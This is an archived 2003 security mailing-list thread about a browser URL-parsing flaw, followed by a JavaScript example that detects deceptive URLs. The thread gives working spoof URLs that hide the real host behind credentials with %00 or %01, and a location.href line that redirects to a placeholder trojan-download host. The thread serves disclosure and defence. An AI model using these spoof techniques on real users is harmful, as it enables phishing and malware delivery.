Message-ID: <1071068780.2357.2.camel@rh9lt.intern.adiscon.com>
From: rgerhards at hq.adiscon.com (Rainer Gerhards)
Subject: RE: FWD: Internet Explorer URL parsing vulnerability

Just to add

http://www.microsoft.com:security%00@....linux.org/

works equally well with Mozilla/5.0 (X11; U; Linux i686; en-US;
rv:1.2.1) Gecko/20030225 under Red Hat Linux 9. So it is not just an IE
issue...

Opera at least displays a decent warning and also replaces the password
part of the credentials in visible display.

Rainer

On Wed, 2003-12-10 at 13:53, Rainer Gerhards wrote:
> Well, 0x00 works even better (as usual). Consider the following URL:
> 
> http://www.microsoft.com:security%00@...w%77%2elinu%78%2eorg
> 
> This, together with a little social engineering, can do much. In my IE
> 6.0.2800.1106.xpsp2.03422-1633 this takes you to www.linux.org, which
> is also shown in the address bar. The status bar will show
> "www.microsoft.com:security" whenever you hover over relative links on
> the site (check with the news). The trick will most probably work well
> with fake sites that remove the address bar.
> 
> The 0x00 C string terminator often causes quite some trouble. I
> remember reporting a similar problem to Microsoft some months ago, then
> related to %00 not being correctly parsed by IIS. It was considered low
> risk by Microsoft and not immediately addressed (I have to admit I
> actually think this is at least not very high risk...). It should be
> addressed by now.
> 
> Back to the discussed topic: I think it is also not very clever to
> display credentials in the status bar. So if somebody is dumb enough to
> actually use URLs with credentials, I think the browser should remove
> them in all visible elements.
> 
> Rainer Gerhards
> Adiscon
> 
> ________________________________
> 
>         From: VeNoMouS [mailto:venom@...-x.co.nz] 
>         Sent: Wednesday, December 10, 2003 6:03 AM
>         To: Julian HO Thean Swee; full-disclosure@...ts.netsys.com
>         Subject: Re: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
>         
>         umm, tested this, you don't need %01 either btw.
>         
>         www.microsoft.com@....linux.org
>         
>         was messing around with some hex style as well. is there a way
>         to call a file:// inside a http:// because the issue with doing
>         the @ trick is it appends http:// automatically, mind you, u
>         could just make it exec some vb code or something on a site,
>         just a random idea any way
>         
>         and it also doesn't seem to work if you use hex as well for the
>         full domain ie
>         
>         www.microsoft.com%40%77%77%77%2E%6C%69%6E%75%78%2E%6F%72%67
>         
>                 nor  www.microsoft.com%40www.linux.org
>         
>                 whereas if you
>                 www.microsoft.com@...%77%77%2E%6C%69%6E%75%78%2E%6F%72%67 works
>         
>         ----- Original Message ----- 
> 
>                 From: Julian HO Thean Swee <mailto:jho@...rhub.com>  
>                 To: 'full-disclosure@...ts.netsys.com' 
>                 Sent: Wednesday, December 10, 2003 4:22 PM
>                 Subject: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability
> 
> 
>                 Hmm, it doesn't seem to work on my browser :) 
>                 I don't even get transported to any page when I click the button. 
>                 But then again, I have everything turned off in the internet zone by default... 
>                 (but my submit non-encrypted form data is on) 
> 
>                 Does it really work then? It looks like it's using javascript...? (location.href) 
>                 Merry Christmas everyone :) 
> 
> 
>                         Message: 1 
>                         Date: Tue, 9 Dec 2003 10:22:59 -0800 (PST) 
>                         From: S G Masood <sgmasood@...oo.com> 
>                         To: full-disclosure@...ts.netsys.com 
>                         Subject: [Full-Disclosure] RE: FWD: Internet Explorer URL parsing vulnerability 
> 
> 
>                         LOL. This is so simple and dangerous, it almost made
>                         me laugh and cry at the same time. Most of you will
>                         realise why...;D 
>                         The Paypal, AOL, Visa, Mastercard, et al email
>                         scammers will have a harvest of gold this month with
>                         lots of zombies falling for this simple technique. 
> 
>                         ># POC ########## 
>                         >http://www.zapthedingbat.com/security/ex01/vun1.htm
> 
>                         Don't be surprised if your latest download from
>                         http://www.microsoft.com turns out to be a trojan! 
> 
>                         location.href=unescape('http://windowsupdate.microsoft.com%01@...edownloadaneviltrojanfromme.com');
> 
> 
>                         -- 
>                         S.G.Masood 
> 
>                         Hyderabad, 
>                         India 
> 
>                         PS: One more thing - no scripting required to exploit this. 
> 
> 
> 
> 
> 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.netsys.com/full-disclosure-charter.html
> 
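The URL variants traded in the thread above (credentials before the "@", %00 and %01 inside them, percent-encoded hostname bytes, and %40 in place of a literal "@"), run through a current WHATWG URL parser. This is an added example, not code from any of the posters; it assumes Node's built-in URL class, and every sample URL below is constructed for the example, with "attacker.example" standing in for the hidden destination host.

```javascript
// Added example, not code from the thread: parse "decoy@real-host" URLs
// with Node's built-in WHATWG URL class and report where each one really
// goes. All sample URLs are constructed; "attacker.example" is a stand-in.

// Percent-encoded C0 control bytes (%00..%1f) and DEL (%7f) inside the
// credentials. %00 and %01 are the bytes used in the thread to cut off
// what older browsers displayed.
const CONTROL_ESCAPE = /%(0[0-9a-f]|1[0-9a-f]|7f)/i;
// Text that looks like a hostname, e.g. "www.microsoft.com".
const LOOKS_LIKE_HOST = /[a-z0-9-]+\.[a-z]{2,}/i;

// The host text as written in the raw string, before the parser
// percent-decodes it (the parsed hostname is already decoded).
function rawHostText(raw) {
  const authority = raw.replace(/^[a-z][a-z0-9+.-]*:\/\//i, '').split(/[\/?#\\]/)[0];
  const at = authority.lastIndexOf('@');
  return at === -1 ? authority : authority.slice(at + 1);
}

// Parse a URL and report the effective host plus the reasons a reader
// might be misled about it.
function inspectUrl(raw) {
  let u;
  try {
    u = new URL(raw);
  } catch (err) {
    // A percent-encoded '@' (%40) is decoded into the hostname, which the
    // host parser rejects, so that variant never reaches the hidden host.
    return { valid: false, hostname: null, username: '', password: '',
             deceptive: false, reasons: ['unparseable'] };
  }
  const reasons = [];
  const userinfo = u.password ? `${u.username}:${u.password}` : u.username;
  if (userinfo) reasons.push('credentials in URL');
  if (LOOKS_LIKE_HOST.test(u.username)) reasons.push('decoy hostname in username');
  if (CONTROL_ESCAPE.test(userinfo)) reasons.push('control character in credentials');
  if (/%[0-9a-f]{2}/i.test(rawHostText(raw))) reasons.push('percent-encoded hostname');
  return { valid: true, hostname: u.hostname, username: u.username,
           password: u.password, deceptive: reasons.length > 0, reasons };
}

// What a browser should show: the real destination with the credentials
// stripped from every visible element, as the reply above asks for.
function safeDisplay(raw) {
  if (!inspectUrl(raw).valid) return '(invalid URL)';
  const u = new URL(raw);
  u.username = '';
  u.password = '';
  return u.href;
}

// Constructed samples covering the variants mentioned in the thread.
const SAMPLES = [
  'http://www.microsoft.com:security%00@attacker.example/', // %00 in the password
  'http://www.microsoft.com%01@attacker.example/',          // %01 in the username
  'http://www.microsoft.com@att%61cker.example/',           // percent-encoded host
  'http://www.microsoft.com%40attacker.example/',           // %40 instead of '@'
  'https://attacker.example/login',                         // plain, for comparison
];

for (const s of SAMPLES) {
  const r = inspectUrl(s);
  console.log(`${s}\n  -> host: ${r.hostname}  show as: ${safeDisplay(s)}` +
              `\n  -> ${r.reasons.join(', ') || 'nothing suspicious'}`);
}
```

The parser keeps "%00" and "%01" as literal text in the credentials rather than treating them as terminators, which is why the decoy no longer truncates anything in a modern browser; the %40 variant fails to parse because the decoded "@" is a forbidden host code point, matching what VeNoMouS observed in IE.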

